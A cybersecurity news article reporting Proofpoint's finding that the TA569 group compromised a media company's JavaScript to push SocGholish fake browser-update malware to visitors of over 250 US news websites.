A threat group named TA569 has been using US news websites to launch what was named SocGholish Malware on their visitors’ systems, found researchers. The group has infected over 250 news websites from the United States of America with SocGholish Malware. However, the actual number is expected to be higher than that, according to researchers at Proofpoint.
How the SocGholish malware was employed?
The SocGholish malware the scammers used to deploy cyberattacks on the visitors’ devices is also called the FakeUpdates malware. This is because the visitors to the news websites were being shown a message asking them to update their browsers using ZIP archives that were actually malware payloads camouflaged as browser updates. Some of the ZIP archives found were:
- Update.zip
- Updater.zip
- Update.zip
- Update.zip and
- Updte.zip
According to research by the cybersecurity firm Proofpoint, the group of scammers that they named TA569 infected the systems of a media company that offers video content and advertises using Javascript to several of its clients. The malicious payload injected into this benign Javascript file would get loaded on the news websites. This news media or service provider has not been publicly named so far. However, the company has initiated an investigation to detect the impact of SocGholish Malware on their operations and readers.
A series of tweets by Proofpoint’s threat insight team stated that intermittent injections on a media company were observed, and pointed to the malicious JS injecting on a rotating basis. “TA569 historically removed and reinstated these malicious JS injects on a rotating basis. Therefore, the presence of the payload and malicious content can vary from hour to hour and shouldn’t be considered a false positive,” said a tweet. The infection would take place after the malicious payloads were downloaded by unsuspecting visitors of the news websites.
Proofpoint Threat Research has observed intermittent injections on a media company that serves many major news outlets. This media company serves content via #Javascript to its partners. By modifying the codebase of this otherwise benign JS, it is now used to deploy #SocGholish.
— Threat Insight (@threatinsight) November 2, 2022
How the media company’s systems were breached is not known yet, Proofpoint Vice President Sherrod DeGrippo told TechCrunch. The list of 250 U.S. newspaper sites that SocGholish Malware infected include many regional titles that served cities including Boston, Chicago, Cincinnati, Miami, New York, Palm Beach, and Washington DC.
TA569 group has been impacting the security of content management systems and hosting accounts since 2016. The group has been associated with several attacks and groups like Evil Corp. Moreover, the SocGholish Malware was also found to be used by the Russian Evil Corp group in the past in similar campaigns infecting via fake software update alerts.
